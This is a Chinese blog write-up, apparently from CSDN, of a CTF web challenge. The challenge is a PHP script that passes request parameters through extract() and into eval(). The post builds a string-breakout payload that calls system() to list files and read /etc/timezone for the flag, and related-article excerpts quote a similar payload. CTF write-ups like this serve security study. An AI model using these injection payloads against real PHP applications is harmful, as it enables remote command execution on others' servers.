[WP/命令注入]DASCTF Oct X 吉林工师 WEB1

最新推荐文章于 2021-12-26 20:45:02 发布
最新推荐文章于 2021-12-26 20:45:02 发布
阅读量338 收藏
点赞数 1
分类专栏: # Write Up 文章标签: 命令注入 DASCTF Oct
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/120977975
版权
本文探讨了一篇关于PHP代码执行漏洞的文章,详细解析了如何利用`highlight_file`和`eval`函数进行命令注入。通过构造特定的payload,如`?attrid[0]=0&attrvalue[0]=0`,可以触发命令执行,如`ls`和`cat`命令来获取系统信息。文章还展示了如何读取`/etc/timezone`文件以获取敏感数据。
摘要由CSDN通过智能技术生成

DASCTF Oct X 吉林工师

WEB1

迷路的魔法少女:魔法少女迷失在了代码空间 请寻找她现在在哪

源码
 <?php
highlight_file('index.php');

extract($_GET);
error_reporting(0);
function String2Array($data)
{
    if($data == '') return array();
    @eval("\$array = $data;");
    return $array;
}


if(is_array($attrid) && is_array($attrvalue))
{
        $attrstr .= 'array(';
        $attrids = count($attrid);
        for($i=0; $i<$attrids; $i++)
        {
            $attrstr .= '"'.intval($attrid[$i]).'"=>'.'"'.$attrvalue[$i].'"';
            if($i < $attrids-1)
            {
                $attrstr .= ',';
            }
        }
        $attrstr .= ');';
}

String2Array($attrstr);

开头extract接收参数生成变量表。

在函数String2Array当中执行了危险函数 eval,可以对其利用以命令执行。

因此构造payload,

首先由合法的eval字符串入手

?attrid[0]=0&attrvalue[0]=0;
array("0"=>"0");

拼接正常逻辑下String2Array()调用的eval参数

"\$array = array("0"=>"0");"

构造非法参数,使非法命令函数溢出。

"\$array = array("0"=>"0");system('ls');(""
attrid[0]=0
attrvalue[0]=0");system('ls /');("

以下只写system的参数

// ls /
bin boot dev etc flag.sh home lib lib64 media mnt opt proc root run sbin srv start.sh sys tmp usr var 

// cat /flag.sh
#!/usr/bin/env bash TZ="Tokyo $FLAG" echo "Tokyo $FLAG" > /etc/timezone export FLAG=not_here FLAG=not_here 

// cat /etc/timezone
Tokyo flag{95df6a50-097c-4082-ae02-beaea86d58ab}
車鈊
关注
专栏目录
X9315WP-2.7的技术参数
12-11
X9315WP-2.7工作电压(V):2.7~5.5总阻值(kΩ):10端电压(V):0~5抽头数:32接口方式:CS,U/D,INC电阻增加方式:线性工作电流(mA):0.050封装/温度(℃):8PDIP/0~70描述:低功耗,低噪声,单DCP,抽头位置掉电保存价格/1片(套):...
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫(有需要的私信)
09-25 1351
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女
llx101388627的博客
10-25 549
这场比赛全是misc,web狗卑微要饭 打开链接,可以得到源码: 我们一步步来看: 1.extract($_GET) extract函数会将函数的数据进行拆解 效果其实相当于给未声明的变量赋值,给已声明的变量则是重新赋值 如: <?php $a = "Original"; $my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse"); extract($my_array); echo "\$a = $a; \$b = $
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp
七月的博客
10-26 3106
本篇文章原文:http://www.7yue.top/dasctf-oct-x-%E5%90%89%E6%9E%97%E5%B7%A5%E5%B8%88-wp/ 雪殇杯好耶,顶碗人大胜利!!! WEB 迷路的魔法少女 ?attrid=0&attrstr=${eval(system('cat /etc/timezone'))} REVERSE 魔法叠加 pyc文件,改掉了magic,首先需要修复一下 前两位是版本信息,fuzz一下可知这是python3.7的pyc文件,正常python3.7的
DASCTF Oct X 吉林工师 欢迎来到魔法世界 部分wp
weixin_44088994的博客
11-21 3880
存一下题(呜呜呜菜狗就是菜狗wp都看不懂 参考:七月大佬DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WP – 七月的摸鱼历程 魔法密文 Writeup| DASCTF Oct X 吉林工师_张麦麦的博客 zhangmaimai.com-CSDN博客 DASCTF Oct X 吉林工师 欢迎来到魔法世界~(魔法少女杯) web 迷路的魔法少女_llx101388627的博客-CSDN博客 签到 1.give you flag 2.闯入魔塔的魔法少女 3.魔法信息 4.魔法秘文 5.卡比卡比
2021DASCTF八月挑战赛Writeup
qq_42815161的博客
08-31 3240
文章目录 MISC 签到 寒王'sblog stealer CRYPTO easymath let's play with rsa~ ezRSA REVERSE py 看大佬们都不想写这个wp那我写一个吧Orz MISC 签到 看看公告 flag{welcome_to_dasctf_aug} 寒王'sblog 好家伙,不知道gitee是什么根本找不到。直接在url后面加上/flag.jpg访问仓库: https://hanwang2333.gitee.io/202.
X9318WP8的技术参数
12-11
产品型号:X9318WP8工作电压(V):5总阻值(kΩ):10端电压(V):0~8抽头数:100接口方式:CS,U/D,INC电阻增加方式:线性工作电流(mA):3封装/温度(℃):8PDIP/0~70描述:单DCP,抽头位置掉电自动保存,高输出端电压价格/1片(套):¥...
X9319WP8的技术参数
12-11
产品型号:X9319WP8工作电压(V):5总阻值(kΩ):10端电压(V):0~10抽头数:100接口方式:CS,U/D,INC电阻增加方式:线性工作电流(mA):3封装/温度(℃):8PDIP/0~70描述:单DCP,抽头位置掉电自动保存价格/1片(套):¥8.49 
X9313WP-3的技术参数
12-12
产品型号:X9313WP-3工作电压(V):3~5.5总阻值(kΩ):10端电压(V):-5~5抽头数:32接口方式:CS,U/D,INC电阻增加方式:线性工作电流(mA):3封装/温度(℃):8PDIP/0~70描述:单DCP,抽头位置掉电自动保存价格/1片(套):¥6.49 
X9318WP8I的技术参数
12-11
产品型号:X9318WP8I工作电压(V):5总阻值(kΩ):10端电压(V):0~8抽头数:100接口方式:CS,U/D,INC电阻增加方式:线性工作电流(mA):3封装/温度(℃):8PDIP/-40~85描述:单DCP,抽头位置掉电自动保存,高输出端电压价格/1片(套)...
DASCTF Oct X 吉林工师-欢迎来到魔法世界-misc-giveyourflag
ookami6497的博客
10-25 607
唯一写出的就这送分题了。。 下载文件,拿到010editor中打开,看到是个压缩包格式,也就压缩了1000遍。。。 手动解了三次发现不行,想着flag应该是放在最后一个压缩包里面的,每次取出头部和尾部,最后的压缩包就是在中间部分。(ZIP格式文件头以50400304 开头,以504B0506结尾) 找到最后一个504B0304开头的部分,这里就是最后的压缩包了,其实这里已经能看到flag了,一串base64加密的字符串 把这部分代码复制出来,另存为zip格式的文件 解压得到fla.
魔法密文 Writeup| DASCTF Oct X 吉林工师
张麦麦
10-28 466
魔法秘文 这题思路还好吧……但是真的属于把我做吐了的那种……具体见后文 首先给了一个zip文件,解压出来一张魔法少女.png,通过binwalk分析出来隐藏了压缩包。 直接用binwalk -e分离发现压缩包大小有问题。 于是使用 hex 编辑器直接删掉了前面的图片部分,得到一个压缩包。 压缩包中有两个文件,flag.txt是加密的,魔法萝莉简体未加密。 提示内容为:密码为32位中文。 解压出来魔法萝莉简体,在hex视图下,字体文件末尾发现一串 urlcode 编码的字符。 urldecode后得到如
2021陇剑杯网络安全大赛wp-简单日志分析(详细题解)
偷一个月亮
09-15 5713
7.1 日志中均为404,没有200,发现还有500,发下参数 7.2 参数值base64解码 7.3 base64解码
WPF应用ocx控件
李淑磊的专栏
08-08 2145
前言最近项目中需要集成电话控制功能。设计到一个USB电话录音盒的二次开发。硬件提供商提供了ocx控件。项目为C/S架构系统,客户端使用了WPF技术。所以本文重点分析,在WPF中如何引用第三方提供的ocx控件。技术准备ocx控件的本质 可以理解为一种基于COM的用户控件 不能独立运行 可以有多种语言编写,包括c++,java等 使用前必须注册,打包应用程序时,最好将控件放到部署目录中,然后注册 Act
DASCTF Oct吉林工师web
weixin_52268949的博客
12-26 1134
迷路的魔法少女 进入环境给出源码 <?php highlight_file('index.php'); extract($_GET); error_reporting(0); function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;"); return $array; } if(is_array($attrid) && is_array($a
DASCTF Oct X 吉林工师 迷路的魔法少女
cjdgg的博客
11-04 317
DASCTF Oct X 吉林工师 迷路的魔法少女 挺久没做php的题目了,有点捞,我写的博客主要也都是分享自己的思路,欢迎各位大佬指点 话不多说,直接进入正题 这题题目直接给了源代码,典型的php命令执行题目吧,做这类题我一般喜欢先找可利用函数,毫无疑问,这题就是eval了 这题目eval这里的利用好奇怪,说实话,可能因为做得少我是没见过这种形式的,所以直接百度了一下看看有没有相关的利用 这里有点运气好haha,直接搜到了有篇文章有相关源代码 这篇文章直接就分析了String2Array($dat
DASCTF X BUU DASCTF2021 misc all WP
mumuzi的博客
05-29 3344
去******的猜******????****** MISC WP 签到: flag{welcome_to_dasctf_may} Holmes: 文件尾有rar,分离出来发现加了密,然鹅图片上面又有跳舞小人 对应解码,得到密码 YOUAREHOLMES 得到一个flag.py flag="flag{********************************}" encflag=[] for i in range(len(flag)): encflag.append((ord(fla
WordPress常用函数以及各模块源码文件名
weixin_30737433的博客
07-18 370
折腾了半天,终于把Blog的样式暂定为现在这样了,折腾中用到了许多函数,拿来跟大家分享下o(∩_∩)o WordPress基本模板文件 style.css : CSS(样式表)文件 index.php : 主页模板 archive.php : Archive/Category模板 404.php : 404页面,错误页模板 comments.php : 留言/回复模板 footer.php :...
FlatScience-WP web安全挑战:SQLite3注入与PDF密码解析
"该资源是关于攻防世界Web进阶挑战的一个案例,主要涉及Web安全中的SQL注入漏洞利用。挑战者需要通过分析源代码、理解SQLite3数据库的使用,并利用SQL注入来获取敏感信息。此外,还涉及到PDF文件的解析和SHA1哈希...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值